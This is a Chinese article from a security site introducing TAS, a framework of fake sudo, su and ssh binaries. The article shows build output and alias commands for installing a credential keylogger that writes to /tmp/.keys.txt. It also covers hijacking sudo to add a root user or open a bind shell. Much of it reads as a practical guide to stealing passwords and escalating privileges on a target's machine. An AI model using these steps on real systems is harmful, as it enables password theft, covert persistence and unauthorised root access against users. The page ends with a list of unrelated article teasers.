TAS:轻量级框架,借助框架可修改tty并创建伪造代码,拥有tas_execv、tas_forkpty和tas_tty_loop三个主要函数
摘要:TAS是一款轻量级框架,借助框架可修改tty并创建伪造代码,拥有tas_execv、tas_forkpty和tas_tty_loop三个主要函数。
TAS是一款轻量级框架,借助框架可修改tty并创建伪造代码,拥有tas_execv、tas_forkpty和tas_tty_loop三个主要函数。
1. tas_execv:该函数类似于execv,但是它不会重新执行当前代码,这对于创建伪代码非常有用;
2. tas_forkpty:该功能与forkpty相同,但是它将自动填充自定义结构,检查forkpty操作页面并获取详细信息;
3. tas_tty_loop:此函数负责修改tty。我们可以为输入和输出数据设置挂钩函数,以便我们可以获取用户的击键输入或修改终端输出(leet-shell)。
如果需要深入了解TAS的工作机制,可以查看此项目的“ tas / fakebins / fun”目录以获取更多信息。
伪造代码
通过修改PATH环境变量或使用别名(或支持别名的其他Shell),可以直接运行其他程序,而无需运行用户实际要运行的程序。这样,我们可以捕获目标用户的键盘点击数据并修改命令行以更改原始程序的行为。
修改某些程序(例如sudo和su)的命令行将有助于我们在目标设备上实现特权升级。
为了使每个人都更容易理解和使用TAS,我创建了三个示例程序来演示框架的功能,即sudo,su和generic-keylogger。
generic-keylogger
顾名思义,generic-keylogger可用作键盘记录程序,我们主要在这里使用它来获取ssh和mysql等程序的密码。
sudo/su
当然,它也可以用作键盘记录程序,或者您可以以root用户身份运行某些功能模块(通过修改命令行)。
Cmd修改步骤
首先,目标用户输入并运行以下命令:
sudo cmd
此时,实际命令如下:
fakesudo cmd
其中,fakesudo将执行以下命令:
sudo fakesudo cmd
使用root特权运行上述命令后,fakesudo将创建一个子进程来执行其某些功能模块,并且在该进程的主PID中,它将运行原始命令。请注意,只有当用户运行的命令是sudo cmd [args]时,fakesudo才会修改命令。如果添加了其他命令运行参数,则无法修改该命令。
如果使用su,则情况类似于sudo。
首先,目标用户输入并运行以下命令:
Su -
此时,实际命令如下:
fakesu -
其中,fakesudo将执行以下命令:
su--c fakesu
使用root特权运行上述命令后,fakesu将创建一个子进程来执行其某些功能模块,并且在该进程的主PID中,它将运行bash -i命令。
注意:仅当用户运行su或su- su时,fakesu才会修改命令。如果添加其他命令运行参数,则无法修改该命令。
功能模块
目前,该工具只有三个功能模块:
1. add-root-user:使用/ etc / passwd中的密码创建一个root用户;
2.bind-shell:监听传入的连接并生成一个tty shell;
3.system:以root权限执行命令;
项目下载
研究人员可以使用以下命令在本地克隆项目源代码:
git clone https://github.com/hc0d3r/tas.git
项目建设
首先,我们需要构建项目库:
$ make
CC .obj/globals.o
CC .obj/getinode.o
CC .obj/tas-execv.o
CC .obj/tty.o
CC .obj/xreadlink.o
AR .obj/libtas.a
接下来,我们需要运行以下命令来构建sudo,su和generic-keylogger:
make [target-bin]
建立样本:
$ make su
make[1]: Entering directory '/home/test/tas/fakebins/su'
[+] configuring fakesu ...
enable keylogger? [y/N] y
number of lines to record [empty = store all]:
logfile (default: /tmp/.keys.txt):
use some FUN modules? [y/N] n
[+] configuration file created in /home/test/tas/fakebins/su/config.h
CC su
make[1]: Leaving directory '/home/test/tas/fakebins/su'
工具使用示例
创建一个fakessh
编译:
$ make generic-keylogger
make[1]: Entering directory '/home/test/tas/fakebins/generic-keylogger'
[+] configuring generic-keylogger ...
number of lines to record [empty = store all]: 3
logfile (default: /tmp/.keys.txt):
[+] configuration file created in /home/test/tas/fakebins/generic-keylogger/config.h
CC generic-keylogger
make[1]: Leaving directory '/home/test/tas/fakebins/generic-keylogger'
安装:
$ mkdir ~/.bin
$ cp generic-keylogger ~/.bin/ssh
$ echo "alias ssh='$HOME/.bin/ssh'" >> ~/.bashrc
演示:
使用bind-shell模块
编译:
make[1]: Entering directory '/home/test/tas/fakebins/sudo'
[+] configuring fakesudo ...
enable keylogger? [y/N] n
use some FUN modules? [y/N] y
[1] add-root-user
[2] bind-shell
[3] system
[4] cancel
> 2
listen port (Default: 1337): 5992
[+] configuration file created in /home/test/tas/fakebins/sudo/config.h
CC sudo
make[1]: Leaving directory '/home/test/tas/fakebins/sudo'
安装:
$ cp sudo〜/ .sudo
$ echo“ alias sudo ='$ HOME / .sudo'” >>〜/ .bashrc
leet-shell
在leet-shell的用例中,您可以修改tty输出,这将允许您使用bash(类似于1337 h4x0r):
[test@alfheim tas]$ make fun/leet-shell
CC fun/leet-shell
[t3st@alfheim tas]$ fun/leet-shell
SP4WN1NG L33T SH3LL H3R3 !!!
[t3st@4lfh31m t4s]$ 3ch0 'l33t sh3ll 1s l33t !!!'
l33t sh3ll 1s l33t !!!
相关热词搜索:TAS 轻量级框架 修改tty 伪造代码 tas_execv tas_forkpty tas_tty_loop 重庆软件开发
上一篇:ApplicationInspector:软件源代码分析和审核工具,识别目标应用程序中的功能,了解目标应用程序的基本特征和实现。
下一篇:DLLPasswordFilterImplant:自定义密码过滤器DLL,用于捕获目标用户凭证信息。
人机验证(Captcha)绕过方法:使用Chrome开发者工具在目标网站登录页面上执行简单的元素编辑,以实现Captcha绕过
牛创网络: " 人机身份验证(Captcha)通常显示在网站的注册,登录名和密码重置页面上。 以下是目标网站在登录页面中排列的验证码机制。 从上图可以
2020-01-26 12:44:09 )8884( 亮了
自动发现IDOR(越权)漏洞的方法:使用BurpSuite中的Autozie和Autorepeater插件来检测和识别IDOR漏洞,而无需手动更改每个请求的参数
牛创网络: "自动发现IDOR(越权)漏洞的方法:使用BurpSuite中的Autozie和Autorepeater插件来检测和识别IDOR漏洞,而无需手动更改每个请求的参数
2020-01-30 14:04:47 )6290( 亮了
Grafana CVE-2020-13379漏洞分析:重定向和URL参数注入漏洞的综合利用可以在任何Grafana产品实例中实现未经授权的服务器端请求伪造攻击SSRF
牛创网络: "在Grafana产品实例中,综合利用重定向和URL参数注入漏洞可以实现未经授权的服务器端请求伪造攻击(SSRF)。该漏洞影响Grafana 3 0 1至7 0 1版本。
2020-08-12 14:26:44 )4310( 亮了
Nginx反向代理配置及反向代理泛目录,目录,全站方法
牛创网络: "使用nginx代理dan(sui)是http响应消息写入服务地址或Web绝对路径的情况。 写一个死的服务地址是很少见的,但它偶尔也会发生。 最棘手的是写入web绝对路径,特别是如果绝对路径没有公共前缀
2019-06-17 10:08:58 )3860( 亮了
fortify sca自定义代码安全扫描工具扫描规则(源代码编写、规则定义和扫描结果展示)
牛创网络: "一般安全问题(例如代码注入漏洞),当前fortify sca规则具有很多误报,可通过规则优化来减少误报。自带的扫描规则不能检测到这些问题。 需要自定义扫描规则,合规性角度展示安全风险。
2020-02-12 10:49:07 )3511( 亮了
整理几款2020年流行的漏洞扫描工具
牛创网络: "漏洞扫描器就是确保可以及时准确地检测信息平台基础架构的安全性,确保业务的平稳发展,业务的高效快速发展以及公司,企业和国家 地区的所有信息资产的维护安全。
2020-08-05 14:36:26 )2537( 亮了
微擎安装使用技巧-微擎安装的时候页面显示空白是怎么回事?
牛创网络: "我们在公众号开发中,有时候会用到微擎,那我们来看一下微擎安装的时候页面显示空白是怎么回事吧
2019-06-08 15:34:16 )2262( 亮了
渗透测试:利用前端断点拦截和JS脚本替换对前端加密数据的修改
牛创网络: " 本文介绍的两种方法,虽然断点调试比JS脚本代码替换更容易,但是JS脚本代码替换方法可以实现更强大的功能,测试人员可以根据实际需要选择适当的测试方法
2020-01-07 09:34:42 )2003( 亮了
从工业界到学界盘点SAS与R优缺点比较
牛创网络: "虽然它在业界仍然由SAS主导,但R在学术界广泛使用,因为它的免费开源属性允许用户编写和共享他们自己的应用程序 然而,由于缺乏SAS经验,许多获得数据分析学位的学生很难找到工作。
2019-07-13 22:25:29 )1843( 亮了
41款APP侵犯用户隐私权:QQ,小米,搜狐,新浪,人人均被通报
牛创网络: "随着互联网的不断发展,我们进入了一个时代,每个人都离不开手机。 但是,APP越来越侵犯了用户隐私权。12月19日,工业和信息化部发布了《关于侵犯用户权益的APP(第一批)》的通知。
2019-12-20 11:28:14 )1776( 亮了